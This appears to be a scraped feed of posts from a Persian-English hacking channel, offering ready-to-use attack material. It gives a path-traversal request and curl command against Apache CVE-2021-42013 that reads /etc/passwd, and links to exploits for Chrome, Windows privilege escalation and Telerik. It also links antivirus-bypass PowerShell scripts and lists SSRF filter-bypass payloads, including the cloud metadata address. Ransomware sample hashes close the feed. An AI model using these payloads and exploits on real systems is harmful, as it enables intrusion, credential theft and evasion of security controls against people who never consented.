apache HTTP server cgi-bin Path traversal and RCE 😍
cve : (CVE-2021-42013)

GET /cgi-bin/%%32%65%%32%65/.../%%32%65%%32%65/etc/passwd HTTP/1.1


This exploit can bypass for Apache HTTP Server 2.4.50 (CVE-2021-41773 Patch Version)🙂


curl http://(domain)/cgi-bin/%%32%65%%32%65/.../%%32%65%%32%65/etc/passwd

2 تا اسکریپت پاورشل که واسه بایپس آنتی ویروس نوشته شدن

https://github.com/tihanyin/PSSW100AVB

آموزش پیدا کردن وب سرور سایت 👍

🕷CVE-2021-30573:Google Chrome 91 Use After Free vulnerability
Version : [91.0.4472.77]
GITHUB : https://github.com/oxctdev/CVE-2021-30573
[HIGH] CVE-2021-30573 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30573

⭕️ Exploit for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE)

https://github.com/ly4k/CallbackHell
#LPE #windows #cve

exploit for telerik.web.ui
old
cve : CVE-2017-11317
قدیمی اما کاربردی

♣Google Chrome NTP XSS via Google Search CSRF

- Link : https://www.suse.com/security/cve/CVE-2021-37999.html

CVE : CVE-2021-37999

- Link : https://bugs.chromium.org/p/chromium/issues/detail?id=1251541

کتاب آموزش کامل ترموکس و دستورات لینوکسی با تصویر و مثال

Windows 10 RCE

The exploit is in the link

Link : https://positive.security/blog/ms-officecmd-rce

#RCE

lets go for ssrf bypass

Bypass using octal IP

Implementations differ on how to handle octal format of ipv4.



http://0177.0.0.1/ = http://127.0.0.1
http://o177.0.0.1/ = http://127.0.0.1
http://0o177.0.0.1/ = http://127.0.0.1
http://q177.0.0.1/ = http://127.0.0.1

Bypass using a decimal IP location



http://2130706433/ = http://127.0.0.1
http://3232235521/ =http://192.168.0.1
http://3232235777/ = http://192.168.1.1
http://2852039166/ = http://169.254.169.254

Bypass localhost with CIDR
It's a /8

http://127.127.127.127
http://127.0.1.3
http://127.0.0.0

Basic SSRF v1

http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://0.0.0.0:80
http://0.0.0.0:443
http://0.0.0.0:22

Bypass localhost with a domain redirection
http://spoofed.burpcollaborator.net
http://localtest.me
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost
http://bugbounty.dod.network redirect to 127.0.0.2 == localhost

using this website for convert ip to integer and bypass🤤


https://www.browserling.com/tools/ip-to-dec

#log4j !!!
https://news.1rj.ru/str/matitanium

😈BlackCat Ransomware Linux variant.😈

-V x32:
843001980e5073c7f0ea8b56873246b8

-V x64: 79fea7f741760ea21ff655137af05bd0


#kernel #blackcat #ransomware #linux

@matitanium